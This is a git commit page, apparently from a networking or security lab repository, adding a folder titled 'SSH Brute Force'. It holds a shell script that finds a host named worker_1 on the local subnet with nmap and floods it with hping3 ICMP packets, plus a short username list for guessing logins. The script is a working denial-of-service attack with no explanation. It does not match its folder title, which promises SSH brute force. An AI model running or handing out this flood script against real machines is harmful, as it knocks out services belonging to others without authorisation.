Browse Source

Upload files to '2. SSH Brute Force'

master
AndreasNefeli 3 years ago
parent
commit
f2132b38e5
  1. 4
      2. SSH Brute Force/master.sh
  2. 6
      2. SSH Brute Force/usernames.txt

4
2. SSH Brute Force/master.sh

@ -0,0 +1,4 @@
my_ip=$(ifconfig eth0 | grep 'inet' | cut -d: -f2 | awk '{print $2}')
network=$(echo $my_ip | sed 's/.[0-9]$/.*/')
worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')
sudo hping3 -p 80 --flood --icmp $worker

6
2. SSH Brute Force/usernames.txt

@ -0,0 +1,6 @@
Andreas
Nefeli
mpampis
oduseas
mhxalhs
docker
Loading…
Cancel
Save